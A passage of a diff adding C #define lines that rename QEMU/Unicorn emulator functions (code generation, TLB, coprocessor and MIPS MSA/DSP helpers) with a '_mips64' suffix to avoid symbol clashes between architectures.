tcg_out_addi tcg_out_addi_mips64 +#define tcg_out_branch tcg_out_branch_mips64 +#define tcg_out_brcond32 tcg_out_brcond32_mips64 +#define tcg_out_brcond64 tcg_out_brcond64_mips64 +#define tcg_out_bswap32 tcg_out_bswap32_mips64 +#define tcg_out_bswap64 tcg_out_bswap64_mips64 +#define tcg_out_call tcg_out_call_mips64 +#define tcg_out_cmp tcg_out_cmp_mips64 +#define tcg_out_ext16s tcg_out_ext16s_mips64 +#define tcg_out_ext16u tcg_out_ext16u_mips64 +#define tcg_out_ext32s tcg_out_ext32s_mips64 +#define tcg_out_ext32u tcg_out_ext32u_mips64 +#define tcg_out_ext8s tcg_out_ext8s_mips64 +#define tcg_out_ext8u tcg_out_ext8u_mips64 +#define tcg_out_jmp tcg_out_jmp_mips64 +#define tcg_out_jxx tcg_out_jxx_mips64 +#define tcg_out_label tcg_out_label_mips64 +#define tcg_out_ld tcg_out_ld_mips64 +#define tcg_out_modrm tcg_out_modrm_mips64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_mips64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mips64 +#define tcg_out_mov tcg_out_mov_mips64 +#define tcg_out_movcond32 tcg_out_movcond32_mips64 +#define tcg_out_movcond64 tcg_out_movcond64_mips64 +#define tcg_out_movi tcg_out_movi_mips64 +#define tcg_out_op tcg_out_op_mips64 +#define tcg_out_pop tcg_out_pop_mips64 +#define tcg_out_push tcg_out_push_mips64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_mips64 +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mips64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mips64 +#define tcg_out_qemu_st tcg_out_qemu_st_mips64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mips64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mips64 +#define tcg_out_reloc tcg_out_reloc_mips64 +#define tcg_out_rolw_8 tcg_out_rolw_8_mips64 +#define tcg_out_setcond32 tcg_out_setcond32_mips64 +#define tcg_out_setcond64 tcg_out_setcond64_mips64 +#define tcg_out_shifti tcg_out_shifti_mips64 +#define tcg_out_st tcg_out_st_mips64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_mips64 +#define tcg_out_tb_init tcg_out_tb_init_mips64 +#define tcg_out_tlb_load tcg_out_tlb_load_mips64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_mips64 +#define tcg_patch32 tcg_patch32_mips64 +#define tcg_patch8 tcg_patch8_mips64 +#define tcg_pcrel_diff tcg_pcrel_diff_mips64 +#define tcg_pool_reset tcg_pool_reset_mips64 +#define tcg_prologue_init tcg_prologue_init_mips64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mips64 +#define tcg_reg_alloc tcg_reg_alloc_mips64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mips64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_mips64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mips64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mips64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_mips64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_mips64 +#define tcg_reg_free tcg_reg_free_mips64 +#define tcg_reg_sync tcg_reg_sync_mips64 +#define tcg_set_frame tcg_set_frame_mips64 +#define tcg_set_nop tcg_set_nop_mips64 +#define tcg_swap_cond tcg_swap_cond_mips64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mips64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mips64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mips64 +#define tcg_target_const_match tcg_target_const_match_mips64 +#define tcg_target_init tcg_target_init_mips64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mips64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mips64 +#define tcg_temp_alloc tcg_temp_alloc_mips64 +#define tcg_temp_free_i32 tcg_temp_free_i32_mips64 +#define tcg_temp_free_i64 tcg_temp_free_i64_mips64 +#define tcg_temp_free_internal tcg_temp_free_internal_mips64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mips64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mips64 +#define tcg_temp_new_i32 tcg_temp_new_i32_mips64 +#define tcg_temp_new_i64 tcg_temp_new_i64_mips64 +#define tcg_temp_new_internal tcg_temp_new_internal_mips64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mips64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mips64 +#define tdb_hash tdb_hash_mips64 +#define teecr_write teecr_write_mips64 +#define teehbr_access teehbr_access_mips64 +#define temp_allocate_frame temp_allocate_frame_mips64 +#define temp_dead temp_dead_mips64 +#define temps_are_copies temps_are_copies_mips64 +#define temp_save temp_save_mips64 +#define temp_sync temp_sync_mips64 +#define tgen_arithi tgen_arithi_mips64 +#define tgen_arithr tgen_arithr_mips64 +#define thumb2_logic_op thumb2_logic_op_mips64 +#define ti925t_initfn ti925t_initfn_mips64 +#define tlb_add_large_page tlb_add_large_page_mips64 +#define tlb_flush_entry tlb_flush_entry_mips64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mips64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mips64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mips64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mips64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mips64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_mips64 +#define tlbiall_is_write tlbiall_is_write_mips64 +#define tlbiall_write tlbiall_write_mips64 +#define tlbiasid_is_write tlbiasid_is_write_mips64 +#define tlbiasid_write tlbiasid_write_mips64 +#define tlbimvaa_is_write tlbimvaa_is_write_mips64 +#define tlbimvaa_write tlbimvaa_write_mips64 +#define tlbimva_is_write tlbimva_is_write_mips64 +#define tlbimva_write tlbimva_write_mips64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_mips64 +#define tlb_protect_code tlb_protect_code_mips64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_mips64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mips64 +#define tlb_set_dirty tlb_set_dirty_mips64 +#define tlb_set_dirty1 tlb_set_dirty1_mips64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mips64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_mips64 +#define token_get_type token_get_type_mips64 +#define token_get_value token_get_value_mips64 +#define token_is_escape token_is_escape_mips64 +#define token_is_keyword token_is_keyword_mips64 +#define token_is_operator token_is_operator_mips64 +#define tokens_append_from_iter tokens_append_from_iter_mips64 +#define to_qiv to_qiv_mips64 +#define to_qov to_qov_mips64 +#define tosa_init tosa_init_mips64 +#define tosa_machine_init tosa_machine_init_mips64 +#define tswap32 tswap32_mips64 +#define tswap64 tswap64_mips64 +#define type_class_get_size type_class_get_size_mips64 +#define type_get_by_name type_get_by_name_mips64 +#define type_get_parent type_get_parent_mips64 +#define type_has_parent type_has_parent_mips64 +#define type_initialize type_initialize_mips64 +#define type_initialize_interface type_initialize_interface_mips64 +#define type_is_ancestor type_is_ancestor_mips64 +#define type_new type_new_mips64 +#define type_object_get_size type_object_get_size_mips64 +#define type_register_internal type_register_internal_mips64 +#define type_table_add type_table_add_mips64 +#define type_table_get type_table_get_mips64 +#define type_table_lookup type_table_lookup_mips64 +#define uint16_to_float32 uint16_to_float32_mips64 +#define uint16_to_float64 uint16_to_float64_mips64 +#define uint32_to_float32 uint32_to_float32_mips64 +#define uint32_to_float64 uint32_to_float64_mips64 +#define uint64_to_float128 uint64_to_float128_mips64 +#define uint64_to_float32 uint64_to_float32_mips64 +#define uint64_to_float64 uint64_to_float64_mips64 +#define unassigned_io_ops unassigned_io_ops_mips64 +#define unassigned_io_read unassigned_io_read_mips64 +#define unassigned_io_write unassigned_io_write_mips64 +#define unassigned_mem_accepts unassigned_mem_accepts_mips64 +#define unassigned_mem_ops unassigned_mem_ops_mips64 +#define unassigned_mem_read unassigned_mem_read_mips64 +#define unassigned_mem_write unassigned_mem_write_mips64 +#define update_spsel update_spsel_mips64 +#define v6_cp_reginfo v6_cp_reginfo_mips64 +#define v6k_cp_reginfo v6k_cp_reginfo_mips64 +#define v7_cp_reginfo v7_cp_reginfo_mips64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_mips64 +#define v7m_pop v7m_pop_mips64 +#define v7m_push v7m_push_mips64 +#define v8_cp_reginfo v8_cp_reginfo_mips64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mips64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mips64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mips64 +#define vapa_cp_reginfo vapa_cp_reginfo_mips64 +#define vbar_write vbar_write_mips64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mips64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mips64 +#define vfp_get_fpcr vfp_get_fpcr_mips64 +#define vfp_get_fpscr vfp_get_fpscr_mips64 +#define vfp_get_fpsr vfp_get_fpsr_mips64 +#define vfp_reg_offset vfp_reg_offset_mips64 +#define vfp_set_fpcr vfp_set_fpcr_mips64 +#define vfp_set_fpscr vfp_set_fpscr_mips64 +#define vfp_set_fpsr vfp_set_fpsr_mips64 +#define visit_end_implicit_struct visit_end_implicit_struct_mips64 +#define visit_end_list visit_end_list_mips64 +#define visit_end_struct visit_end_struct_mips64 +#define visit_end_union visit_end_union_mips64 +#define visit_get_next_type visit_get_next_type_mips64 +#define visit_next_list visit_next_list_mips64 +#define visit_optional visit_optional_mips64 +#define visit_start_implicit_struct visit_start_implicit_struct_mips64 +#define visit_start_list visit_start_list_mips64 +#define visit_start_struct visit_start_struct_mips64 +#define visit_start_union visit_start_union_mips64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_mips64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mips64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mips64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mips64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_mips64 +#define vmsa_ttbr_write vmsa_ttbr_write_mips64 +#define write_cpustate_to_list write_cpustate_to_list_mips64 +#define write_list_to_cpustate write_list_to_cpustate_mips64 +#define write_raw_cp_reg write_raw_cp_reg_mips64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_mips64 +#define x86_op_defs x86_op_defs_mips64 +#define xpsr_read xpsr_read_mips64 +#define xpsr_write xpsr_write_mips64 +#define xscale_cpar_write xscale_cpar_write_mips64 +#define xscale_cp_reginfo xscale_cp_reginfo_mips64 +#define cpu_mips_exec cpu_mips_exec_mips64 +#define cpu_mips_get_random cpu_mips_get_random_mips64 +#define cpu_mips_get_count cpu_mips_get_count_mips64 +#define cpu_mips_store_count cpu_mips_store_count_mips64 +#define cpu_mips_store_compare cpu_mips_store_compare_mips64 +#define cpu_mips_start_count cpu_mips_start_count_mips64 +#define cpu_mips_stop_count cpu_mips_stop_count_mips64 +#define mips_machine_init mips_machine_init_mips64 +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mips64 +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mips64 +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mips64 +#define mips_cpu_register_types mips_cpu_register_types_mips64 +#define cpu_mips_init cpu_mips_init_mips64 +#define cpu_state_reset cpu_state_reset_mips64 +#define helper_msa_andi_b helper_msa_andi_b_mips64 +#define helper_msa_ori_b helper_msa_ori_b_mips64 +#define helper_msa_nori_b helper_msa_nori_b_mips64 +#define helper_msa_xori_b helper_msa_xori_b_mips64 +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64 +#define helper_msa_bmzi_b helper_msa_bmzi_b_mips64 +#define helper_msa_bseli_b helper_msa_bseli_b_mips64 +#define helper_msa_shf_df helper_msa_shf_df_mips64 +#define helper_msa_and_v helper_msa_and_v_mips64 +#define helper_msa_or_v helper_msa_or_v_mips64 +#define helper_msa_nor_v helper_msa_nor_v_mips64 +#define helper_msa_xor_v helper_msa_xor_v_mips64 +#define helper_msa_bmnz_v helper_msa_bmnz_v_mips64 +#define helper_msa_bmz_v helper_msa_bmz_v_mips64 +#define helper_msa_bsel_v helper_msa_bsel_v_mips64 +#define helper_msa_addvi_df helper_msa_addvi_df_mips64 +#define helper_msa_subvi_df helper_msa_subvi_df_mips64 +#define helper_msa_ceqi_df helper_msa_ceqi_df_mips64 +#define helper_msa_clei_s_df helper_msa_clei_s_df_mips64 +#define helper_msa_clei_u_df helper_msa_clei_u_df_mips64 +#define helper_msa_clti_s_df helper_msa_clti_s_df_mips64 +#define helper_msa_clti_u_df helper_msa_clti_u_df_mips64 +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64 +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64 +#define helper_msa_mini_s_df helper_msa_mini_s_df_mips64 +#define helper_msa_mini_u_df helper_msa_mini_u_df_mips64 +#define helper_msa_ldi_df helper_msa_ldi_df_mips64 +#define helper_msa_slli_df helper_msa_slli_df_mips64 +#define helper_msa_srai_df helper_msa_srai_df_mips64 +#define helper_msa_srli_df helper_msa_srli_df_mips64 +#define helper_msa_bclri_df helper_msa_bclri_df_mips64 +#define helper_msa_bseti_df helper_msa_bseti_df_mips64 +#define helper_msa_bnegi_df helper_msa_bnegi_df_mips64 +#define helper_msa_sat_s_df helper_msa_sat_s_df_mips64 +#define helper_msa_sat_u_df helper_msa_sat_u_df_mips64 +#define helper_msa_srari_df helper_msa_srari_df_mips64 +#define helper_msa_srlri_df helper_msa_srlri_df_mips64 +#define helper_msa_binsli_df helper_msa_binsli_df_mips64 +#define helper_msa_binsri_df helper_msa_binsri_df_mips64 +#define helper_msa_sll_df helper_msa_sll_df_mips64 +#define helper_msa_sra_df helper_msa_sra_df_mips64 +#define helper_msa_srl_df helper_msa_srl_df_mips64 +#define helper_msa_bclr_df helper_msa_bclr_df_mips64 +#define helper_msa_bset_df helper_msa_bset_df_mips64 +#define helper_msa_bneg_df helper_msa_bneg_df_mips64 +#define helper_msa_addv_df helper_msa_addv_df_mips64 +#define helper_msa_subv_df helper_msa_subv_df_mips64 +#define helper_msa_max_s_df helper_msa_max_s_df_mips64 +#define helper_msa_max_u_df helper_msa_max_u_df_mips64 +#define helper_msa_min_s_df helper_msa_min_s_df_mips64 +#define helper_msa_min_u_df helper_msa_min_u_df_mips64 +#define helper_msa_max_a_df helper_msa_max_a_df_mips64 +#define helper_msa_min_a_df helper_msa_min_a_df_mips64 +#define helper_msa_ceq_df helper_msa_ceq_df_mips64 +#define helper_msa_clt_s_df helper_msa_clt_s_df_mips64 +#define helper_msa_clt_u_df helper_msa_clt_u_df_mips64 +#define helper_msa_cle_s_df helper_msa_cle_s_df_mips64 +#define helper_msa_cle_u_df helper_msa_cle_u_df_mips64 +#define helper_msa_add_a_df helper_msa_add_a_df_mips64 +#define helper_msa_adds_a_df helper_msa_adds_a_df_mips64 +#define helper_msa_adds_s_df helper_msa_adds_s_df_mips64 +#define helper_msa_adds_u_df helper_msa_adds_u_df_mips64 +#define helper_msa_ave_s_df helper_msa_ave_s_df_mips64 +#define helper_msa_ave_u_df helper_msa_ave_u_df_mips64 +#define helper_msa_aver_s_df helper_msa_aver_s_df_mips64 +#define helper_msa_aver_u_df helper_msa_aver_u_df_mips64 +#define helper_msa_subs_s_df helper_msa_subs_s_df_mips64 +#define helper_msa_subs_u_df helper_msa_subs_u_df_mips64 +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64 +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64 +#define helper_msa_asub_s_df helper_msa_asub_s_df_mips64 +#define helper_msa_asub_u_df helper_msa_asub_u_df_mips64 +#define helper_msa_mulv_df helper_msa_mulv_df_mips64 +#define helper_msa_div_s_df helper_msa_div_s_df_mips64 +#define helper_msa_div_u_df helper_msa_div_u_df_mips64 +#define helper_msa_mod_s_df helper_msa_mod_s_df_mips64 +#define helper_msa_mod_u_df helper_msa_mod_u_df_mips64 +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64 +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64 +#define helper_msa_srar_df helper_msa_srar_df_mips64 +#define helper_msa_srlr_df helper_msa_srlr_df_mips64 +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mips64 +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mips64 +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mips64 +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mips64 +#define helper_msa_mul_q_df helper_msa_mul_q_df_mips64 +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64 +#define helper_msa_sld_df helper_msa_sld_df_mips64 +#define helper_msa_maddv_df helper_msa_maddv_df_mips64 +#define helper_msa_msubv_df helper_msa_msubv_df_mips64 +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64 +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64 +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64 +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64 +#define helper_msa_binsl_df helper_msa_binsl_df_mips64 +#define helper_msa_binsr_df helper_msa_binsr_df_mips64 +#define helper_msa_madd_q_df helper_msa_madd_q_df_mips64 +#define helper_msa_msub_q_df helper_msa_msub_q_df_mips64 +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64 +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64 +#define helper_msa_splat_df helper_msa_splat_df_mips64 +#define helper_msa_pckev_df helper_msa_pckev_df_mips64 +#define helper_msa_pckod_df helper_msa_pckod_df_mips64 +#define helper_msa_ilvl_df helper_msa_ilvl_df_mips64 +#define helper_msa_ilvr_df helper_msa_ilvr_df_mips64 +#define helper_msa_ilvev_df helper_msa_ilvev_df_mips64 +#define helper_msa_ilvod_df helper_msa_ilvod_df_mips64 +#define helper_msa_vshf_df helper_msa_vshf_df_mips64 +#define helper_msa_sldi_df helper_msa_sldi_df_mips64 +#define helper_msa_splati_df helper_msa_splati_df_mips64 +#define helper_msa_copy_s_df helper_msa_copy_s_df_mips64 +#define helper_msa_copy_u_df helper_msa_copy_u_df_mips64 +#define helper_msa_insert_df helper_msa_insert_df_mips64 +#define helper_msa_insve_df helper_msa_insve_df_mips64 +#define helper_msa_ctcmsa helper_msa_ctcmsa_mips64 +#define helper_msa_cfcmsa helper_msa_cfcmsa_mips64 +#define helper_msa_move_v helper_msa_move_v_mips64 +#define helper_msa_fill_df helper_msa_fill_df_mips64 +#define helper_msa_nlzc_df helper_msa_nlzc_df_mips64 +#define helper_msa_nloc_df helper_msa_nloc_df_mips64 +#define helper_msa_pcnt_df helper_msa_pcnt_df_mips64 +#define helper_msa_fcaf_df helper_msa_fcaf_df_mips64 +#define helper_msa_fcun_df helper_msa_fcun_df_mips64 +#define helper_msa_fceq_df helper_msa_fceq_df_mips64 +#define helper_msa_fcueq_df helper_msa_fcueq_df_mips64 +#define helper_msa_fclt_df helper_msa_fclt_df_mips64 +#define helper_msa_fcult_df helper_msa_fcult_df_mips64 +#define helper_msa_fcle_df helper_msa_fcle_df_mips64 +#define helper_msa_fcule_df helper_msa_fcule_df_mips64 +#define helper_msa_fsaf_df helper_msa_fsaf_df_mips64 +#define helper_msa_fsun_df helper_msa_fsun_df_mips64 +#define helper_msa_fseq_df helper_msa_fseq_df_mips64 +#define helper_msa_fsueq_df helper_msa_fsueq_df_mips64 +#define helper_msa_fslt_df helper_msa_fslt_df_mips64 +#define helper_msa_fsult_df helper_msa_fsult_df_mips64 +#define helper_msa_fsle_df helper_msa_fsle_df_mips64 +#define helper_msa_fsule_df helper_msa_fsule_df_mips64 +#define helper_msa_fcor_df helper_msa_fcor_df_mips64 +#define helper_msa_fcune_df helper_msa_fcune_df_mips64 +#define helper_msa_fcne_df helper_msa_fcne_df_mips64 +#define helper_msa_fsor_df helper_msa_fsor_df_mips64 +#define helper_msa_fsune_df helper_msa_fsune_df_mips64 +#define helper_msa_fsne_df helper_msa_fsne_df_mips64 +#define helper_msa_fadd_df helper_msa_fadd_df_mips64 +#define helper_msa_fsub_df helper_msa_fsub_df_mips64 +#define helper_msa_fmul_df helper_msa_fmul_df_mips64 +#define helper_msa_fdiv_df helper_msa_fdiv_df_mips64 +#define helper_msa_fmadd_df helper_msa_fmadd_df_mips64 +#define helper_msa_fmsub_df helper_msa_fmsub_df_mips64 +#define helper_msa_fexp2_df helper_msa_fexp2_df_mips64 +#define helper_msa_fexdo_df helper_msa_fexdo_df_mips64 +#define helper_msa_ftq_df helper_msa_ftq_df_mips64 +#define helper_msa_fmin_df helper_msa_fmin_df_mips64 +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64 +#define helper_msa_fmax_df helper_msa_fmax_df_mips64 +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64 +#define helper_msa_fclass_df helper_msa_fclass_df_mips64 +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64 +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64 +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64 +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64 +#define helper_msa_frcp_df helper_msa_frcp_df_mips64 +#define helper_msa_frint_df helper_msa_frint_df_mips64 +#define helper_msa_flog2_df helper_msa_flog2_df_mips64 +#define helper_msa_fexupl_df helper_msa_fexupl_df_mips64 +#define helper_msa_fexupr_df helper_msa_fexupr_df_mips64 +#define helper_msa_ffql_df helper_msa_ffql_df_mips64 +#define helper_msa_ffqr_df helper_msa_ffqr_df_mips64 +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64 +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64 +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64 +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64 +#define helper_paddsb helper_paddsb_mips64 +#define helper_paddusb helper_paddusb_mips64 +#define helper_paddsh helper_paddsh_mips64 +#define helper_paddush helper_paddush_mips64 +#define helper_paddb helper_paddb_mips64 +#define helper_paddh helper_paddh_mips64 +#define helper_paddw helper_paddw_mips64 +#define helper_psubsb helper_psubsb_mips64 +#define helper_psubusb helper_psubusb_mips64 +#define helper_psubsh helper_psubsh_mips64 +#define helper_psubush helper_psubush_mips64 +#define helper_psubb helper_psubb_mips64 +#define helper_psubh helper_psubh_mips64 +#define helper_psubw helper_psubw_mips64 +#define helper_pshufh helper_pshufh_mips64 +#define helper_packsswh helper_packsswh_mips64 +#define helper_packsshb helper_packsshb_mips64 +#define helper_packushb helper_packushb_mips64 +#define helper_punpcklwd helper_punpcklwd_mips64 +#define helper_punpckhwd helper_punpckhwd_mips64 +#define helper_punpcklhw helper_punpcklhw_mips64 +#define helper_punpckhhw helper_punpckhhw_mips64 +#define helper_punpcklbh helper_punpcklbh_mips64 +#define helper_punpckhbh helper_punpckhbh_mips64 +#define helper_pavgh helper_pavgh_mips64 +#define helper_pavgb helper_pavgb_mips64 +#define helper_pmaxsh helper_pmaxsh_mips64 +#define helper_pminsh helper_pminsh_mips64 +#define helper_pmaxub helper_pmaxub_mips64 +#define helper_pminub helper_pminub_mips64 +#define helper_pcmpeqw helper_pcmpeqw_mips64 +#define helper_pcmpgtw helper_pcmpgtw_mips64 +#define helper_pcmpeqh helper_pcmpeqh_mips64 +#define helper_pcmpgth helper_pcmpgth_mips64 +#define helper_pcmpeqb helper_pcmpeqb_mips64 +#define helper_pcmpgtb helper_pcmpgtb_mips64 +#define helper_psllw helper_psllw_mips64 +#define helper_psrlw helper_psrlw_mips64 +#define helper_psraw helper_psraw_mips64 +#define helper_psllh helper_psllh_mips64 +#define helper_psrlh helper_psrlh_mips64 +#define helper_psrah helper_psrah_mips64 +#define helper_pmullh helper_pmullh_mips64 +#define helper_pmulhh helper_pmulhh_mips64 +#define helper_pmulhuh helper_pmulhuh_mips64 +#define helper_pmaddhw helper_pmaddhw_mips64 +#define helper_pasubub helper_pasubub_mips64 +#define helper_biadd helper_biadd_mips64 +#define helper_pmovmskb helper_pmovmskb_mips64 +#define helper_absq_s_ph helper_absq_s_ph_mips64 +#define helper_absq_s_qb helper_absq_s_qb_mips64 +#define helper_absq_s_w helper_absq_s_w_mips64 +#define helper_addqh_ph helper_addqh_ph_mips64 +#define helper_addqh_r_ph helper_addqh_r_ph_mips64 +#define helper_addqh_r_w helper_addqh_r_w_mips64 +#define helper_addqh_w helper_addqh_w_mips64 +#define helper_adduh_qb helper_adduh_qb_mips64 +#define helper_adduh_r_qb helper_adduh_r_qb_mips64 +#define helper_subqh_ph helper_subqh_ph_mips64 +#define helper_subqh_r_ph helper_subqh_r_ph_mips64 +#define helper_subqh_r_w helper_subqh_r_w_mips64 +#define helper_subqh_w helper_subqh_w_mips64 +#define helper_addq_ph helper_addq_ph_mips64 +#define helper_addq_s_ph helper_addq_s_ph_mips64 +#define helper_addq_s_w helper_addq_s_w_mips64 +#define helper_addu_ph helper_addu_ph_mips64 +#define helper_addu_qb helper_addu_qb_mips64 +#define helper_addu_s_ph helper_addu_s_ph_mips64 +#define helper_addu_s_qb helper_addu_s_qb_mips64 +#define helper_subq_ph helper_subq_ph_mips64 +#define helper_subq_s_ph helper_subq_s_ph_mips64 +#define helper_subq_s_w helper_subq_s_w_mips64 +#define helper_subu_ph helper_subu_ph_mips64 +#define helper_subu_qb helper_subu_qb_mips64 +#define helper_subu_s_ph helper_subu_s_ph_mips64 +#define helper_subu_s_qb helper_subu_s_qb_mips64 +#define helper_subuh_qb helper_subuh_qb_mips64 +#define helper_subuh_r_qb helper_subuh_r_qb_mips64 +#define helper_addsc helper_addsc_mips64 +#define helper_addwc helper_addwc_mips64 +#define helper_modsub helper_modsub_mips64 +#define helper_raddu_w_qb helper_raddu_w_qb_mips64 +#define helper_precr_qb_ph helper_precr_qb_ph_mips64 +#define helper_precrq_qb_ph helper_precrq_qb_ph_mips64 +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64 +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64 +#define helper_precrq_ph_w helper_precrq_ph_w_mips64 +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64 +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64 +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64 +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64 +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64 +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64 +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64 +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64 +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64 +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64 +#define helper_shll_qb helper_shll_qb_mips64 +#define helper_shrl_qb helper_shrl_qb_mips64 +#define helper_shra_qb helper_shra_qb_mips64 +#define helper_shra_r_qb helper_shra_r_qb_mips64 +#define helper_shll_ph helper_shll_ph_mips64 +#define helper_shll_s_ph helper_shll_s_ph_mips64 +#define helper_shll_s_w helper_shll_s_w_mips64 +#define helper_shra_r_w helper_shra_r_w_mips64 +#define helper_shrl_ph helper_shrl_ph_mips64 +#define helper_shra_ph helper_shra_ph_mips64 +#define helper_shra_r_ph helper_shra_r_ph_mips64 +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64 +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64 +#define helper_mulq_rs_ph helper_mulq_rs_ph_mips64 +#define helper_mul_ph helper_mul_ph_mips64 +#define helper_mul_s_ph helper_mul_s_ph_mips64 +#define helper_mulq_s_ph helper_mulq_s_ph_mips64 +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64 +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64 +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64 +#define helper_mulsa_w_ph helper_mulsa_w_ph_mips64 +#define helper_dpau_h_qbl helper_dpau_h_qbl_mips64 +#define helper_dpau_h_qbr helper_dpau_h_qbr_mips64 +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64 +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64 +#define helper_dpa_w_ph helper_dpa_w_ph_mips64 +#define helper_dpax_w_ph helper_dpax_w_ph_mips64 +#define helper_dps_w_ph helper_dps_w_ph_mips64 +#define helper_dpsx_w_ph helper_dpsx_w_ph_mips64 +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64 +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64 +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64 +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64 +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64 +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64 +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64 +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64 +#define helper_maq_s_w_phl helper_maq_s_w_phl_mips64 +#define helper_maq_s_w_phr helper_maq_s_w_phr_mips64 +#define helper_maq_sa_w_phl 